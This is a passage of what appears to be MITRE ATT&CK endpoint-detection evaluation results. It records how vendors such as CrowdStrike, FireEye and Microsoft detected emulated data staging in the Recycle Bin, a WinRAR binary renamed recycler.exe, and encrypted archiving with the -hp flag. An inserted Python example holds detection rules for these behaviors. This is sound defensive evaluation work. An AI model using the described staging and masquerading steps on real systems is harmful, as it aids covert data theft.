No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
Telemetry
Telemetry showed filemod events for the creation and write of the .vsdx file in the Recycle Bin. [1] [2]
Specific Behavior
A Specific Behavior alert was generated with a severity score of 60/100 and was mapped to the correct ATT&CK Technique (T1074 - Data Staged). [1] [2]
CrowdStrike
Telemetry
Telemetry showed the .vsdx file being written into the Recycle Bin. [1] [2]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the .vsdx file was copied to the Recycle Bin, a "likely location to stage files of interest." OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1]
Endgame
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent powershell.exe alerts on "PowerShell with Unusual Arguments" and "PowerShell Network". [1] [2]
FireEye
Telemetry (Tainted)
Telemetry showed the creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent PowerShell File Write alert. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated on the file write of the .vsdx named File Write To Root Of Recycle Bin (Weak Signal). The alert details explained how all legitimate files should be written to a subfolder of the recycle bin, and not to the root. [1] [2] [3]
F-Secure
Telemetry
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker (10.0.0.5) to the Recycle Bin as well as a file create event. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker to the Recycle Bin. The telemetry was tainted by the parent "Powershell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
Telemetry (Tainted)
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Specific Behavior
A Specific Behavior alert was generated for PowerShell creating a file in the Recycle Bin. The alert was tagged with the correct ATT&CK Tactic (Collection) and Technique (Data Staged). [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt, pdf, etc.) at the time of test. [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed file read and write events for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker) to the Recycle Bin. The telemetry was tainted by a parent alert on wscript.exe. [1]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of the .vsdx to the Recycle Bin. The activity seen during the lateral movement step tainted the telemetry because it was associated with the same story (Group ID). [1]
Carbon Black
None
No detection capability demonstrated for this procedure. Telemetry was available for the file write of the .vsdx file into the Recycle Bin, but no data was available that indicated it came from a network shared drive.
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry was available for the file write of the .vsdx into the Recycle Bin (no data was available that indicated it came from a network shared drive).
Cybereason
None
No detection capability demonstrated for this procedure. [1]
Endgame
None
No detection capability demonstrated for this procedure. Telemetry was available for the file write of shockwave_network.vsdx into the Recycle Bin, but no data was available that indicated it came from a network shared drive. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker (10.0.0.5) to the Recycle Bin. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe copying the .vsdx file from the network shared drive on Conficker to the Recycle Bin. The telemetry was tainted by the parent "Powershell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt, pdf, etc.) at the time of test. [1]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script engine reading files from network locations. The alert was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed a file read event for the .vsdx file from the network shared drive on 10.0.0.5 (Conficker). The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed the .vsdx file copied from a network shared drive on Conficker. The activity seen during the lateral movement step tainted the telemetry because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the creation of recycler.exe. Binary metadata on recycler.exe indicated it was masquerading and had a digital signature and file metadata that matched the WinRAR utility. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry showed the SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed that recycler.exe was WinRAR via file metadata. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
None
No detection capability demonstrated for this procedure. Telemetry later identified recycler.exe as WinRAR during execution; no detections identified it as WinRAR upon file copy. [1] [2] [3]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the attacker placing the WinRAR utility on the system as recycler.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed the MD5 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by the parent PowerShell File Write alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry later identified recycler.exe as WinRAR during execution (no detections identified it as WinRAR upon file copy). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry
Telemetry showed the MD5/SHA256 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed file creation of recycler.exe on CodeRed. Binary reputation and metadata for recycler.exe shows hash and publisher signature as win.rar GmbH indicating the file is actually the WinRAR utility. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the MD5 and SHA256 hash values of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4]
RSA
None
No detection capability demonstrated for this procedure. Telemetry later identified recycler.exe as WinRAR during execution; no detections identified it as WinRAR upon file copy. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed file creation event for recycler.exe on CodeRed along with MD5, SHA1, and SHA256 hashes. Hashes could be used to look up information on the binary. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
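The path and hash checks that the vendor telemetry and alerts above rely on, written out as an added example that is not part of the evaluation or of any vendor's product: it runs over constructed file-write events and flags an accessibility binary in System32 replaced by a known binary (the magnify.exe overwrite), a known binary written under another name (recycler.exe carrying WinRAR's hash), and writes to the root of the Recycle Bin (the rule FireEye's File Write To Root Of Recycle Bin alert describes). All hash values, process names and paths are constructed placeholders.

```python
"""Added example: file-write detection checks modelled on the procedures above."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Accessibility feature binaries launched from the logon screen (ATT&CK T1015).
ACCESSIBILITY_BINARIES = {"magnify.exe", "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe"}

# Processes expected to legitimately service binaries under System32 (assumption).
SERVICING_PROCESSES = {"trustedinstaller.exe", "tiworker.exe"}

# Constructed placeholder hashes standing in for the reputation data an EDR carries.
# Maps SHA-256 -> the file name that hash is known under.
KNOWN_BINARY_HASHES = {
    "c" * 64: "cmd.exe",
    "a" * 64: "magnify.exe",
    "b" * 64: "winrar.exe",
}

# A file directly under System32 / directly under the $Recycle.Bin root (no subfolder).
SYSTEM32_RE = re.compile(r"^[a-z]:\\windows\\system32\\[^\\]+$", re.IGNORECASE)
RECYCLE_ROOT_RE = re.compile(r"^[a-z]:\\\$recycle\.bin\\[^\\]+$", re.IGNORECASE)


@dataclass(frozen=True)
class FileWriteEvent:
    process: str   # image name of the process that wrote the file
    path: str      # full path of the written file
    sha256: str    # hash of the file content after the write


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def renamed_known_binary(ev: FileWriteEvent) -> Optional[str]:
    """Return the name the hash is known under if the file was written under another name."""
    expected = KNOWN_BINARY_HASHES.get(ev.sha256.lower())
    if expected and expected != basename(ev.path):
        return expected
    return None


def accessibility_feature_replaced(ev: FileWriteEvent) -> bool:
    """Write to an accessibility binary in System32 by a non-servicing process,
    or by any process when the new content is a different known binary."""
    if not SYSTEM32_RE.match(ev.path) or basename(ev.path) not in ACCESSIBILITY_BINARIES:
        return False
    untrusted_writer = ev.process.lower() not in SERVICING_PROCESSES
    return untrusted_writer or renamed_known_binary(ev) is not None


def recycle_bin_root_write(ev: FileWriteEvent) -> bool:
    """Legitimate deletions land in a per-user subfolder, never in the root."""
    return bool(RECYCLE_ROOT_RE.match(ev.path))


def evaluate(ev: FileWriteEvent) -> List[str]:
    findings = []
    real_name = renamed_known_binary(ev)
    if accessibility_feature_replaced(ev):
        findings.append(f"T1015 accessibility feature replaced: {basename(ev.path)} is now {real_name}")
    elif real_name:
        findings.append(f"T1036 masquerading: {basename(ev.path)} is {real_name}")
    if recycle_bin_root_write(ev):
        findings.append("staging: file written to root of Recycle Bin")
    return findings


def run(events: List[FileWriteEvent]) -> List[Tuple[FileWriteEvent, List[str]]]:
    """Return only the events that produced findings, with their findings."""
    report = []
    for ev in events:
        findings = evaluate(ev)
        if findings:
            report.append((ev, findings))
    return report


# Constructed sample events, loosely modelled on the procedures described above.
SAMPLE_EVENTS = [
    FileWriteEvent("powershell.exe", r"C:\Windows\System32\magnify.exe", "c" * 64),
    FileWriteEvent("TrustedInstaller.exe", r"C:\Windows\System32\magnify.exe", "a" * 64),
    FileWriteEvent("powershell.exe", r"C:\$Recycle.Bin\shockwave_network.vsdx", "d" * 64),
    FileWriteEvent("explorer.exe", r"C:\$Recycle.Bin\S-1-5-21-1000\$RABC123.docx", "e" * 64),
    FileWriteEvent("powershell.exe", r"C:\$Recycle.Bin\recycler.exe", "b" * 64),
    FileWriteEvent("winword.exe", r"C:\Users\alice\Documents\report.docx", "f" * 64),
]

if __name__ == "__main__":
    for ev, findings in run(SAMPLE_EVENTS):
        print(f"{ev.process} -> {ev.path}")
        for f in findings:
            print("   ", f)
```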
Carbon Black
Telemetry
Telemetry showed the creation of recycler.exe. [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed file write of recycler.exe by powershell.exe as well as the network connection over which the download occurred. The process tree view showed the parent powershell.exe process as tainted by a previous wscript.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it indicated the attacker placed recycler.exe on the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched powershell.exe writing recycler.exe with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed powershell.exe creating recycler.exe. [1] [2] [3] [4] [5] [6]
GoSecure
General Behavior (Configuration Change)
A General Behavior alert called "Policy Dropper Behavior" was generated based on three events occurring in the same parent process within a set time frame, a network connection (TCP Outbound to 192.168.0.5 over 443) followed by an executable file create (powershell.exe creating recycler.exe) followed by a process spawning from that executable (powershell.exe creating the recycler.exe process). The capability may have been modified after the start of the evaluation to create this alert, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry
Telemetry showed file creation event for recycler.exe. [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe creating the recycler.exe file (tainted by a prior alert on a PowerShell script with a suspicious command line, which was generated by numerous scripts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
General Behavior (Tainted)
A General Behavior alert was generated for executables created to disk by the Windows scripting engine. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed the file create and write events for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Tainted)
A General Behavior alert was generated for PowerShell dropping an executable file to disk. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed a write file event for recycler.exe. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed file write of recycler.exe with hash value. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. [1] [2] [3]
Enrichment
The capability enriched recycler.exe with the correct ATT&CK Technique (T1002 - Data Compressed). [1] [2] [3]
CrowdStrike
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a RAR archive "written by a process with suspicious command line arguments." The alert showed the command-line details and was tagged with the correct ATT&CK Technique (Data Compressed) and Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because a .vsdx file was archived for likely exfiltration using the renamed RAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Cybereason
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched recycler.exe with a related ATT&CK Technique (T1022 - Data Encrypted) and Tactic (Exfiltration). The enrichment was tainted by a parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data. The telemetry was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched the file write of RAR with a second alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the command line output containing -hp with an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it showed the attacker executed recycler.exe to create an encrypted RAR file, old.rar. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (recycler) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. Additionally, recycler.exe was identified as WinRAR via file metadata, including executable product and description. Telemetry also showed the creation of old.rar as the output of recycler.exe running. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag, indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by an alert on a PowerShell script with a suspicious command line that was generated by numerous scripts). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe. [1]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including the -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. [1] [2]
Enrichment
The capability enriched recycler.exe with the correct ATT&CK Technique (1022 - Data Encrypted). [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2]
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2]
Enrichment (Delayed, Tainted)
The capability enriched recycler.exe with the correct ATT&CK Technique (T1022 - Data Encrypted) and Tactic (Exfiltration). The enrichment was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data. The telemetry was tainted by parent Windows Script Executing PowerShell alert. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1022 - Data Encrypted). [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (recycler) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag, indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by an alert on a PowerShell script with a suspicious command line that was generated by numerous scripts). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including the -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. [1] [2] [3] [4] [5] [6]
Specific Behavior
A Specific Behavior alert was generated on execution of recycler.exe indicating it was WinRAR and was masquerading as a renamed process. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was generated on execution of recycler.exe named "Exfiltration-Encrypting Files with WinRar". The alert was tainted by parent Windows Script Executing PowerShell alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by parent Windows Script Executing PowerShell alert. [1] [2] [3]
FireEye
General Behavior
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with related ATT&CK Techniques (T1022 - Data Encrypted and T1002 - Data Compressed). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. Additionally, recycler.exe was identified as WinRAR via file metadata, including executable product and description. [1] [2] [3]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed recycler.exe creating old.rar in the Recycle Bin and enriched the data with "Data Exfiltration Archiving" due to the archive file being created. The enrichment was tainted by parent "Powershell executed encoded command" alerts. The conditions contributing to Enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
Telemetry (Tainted)
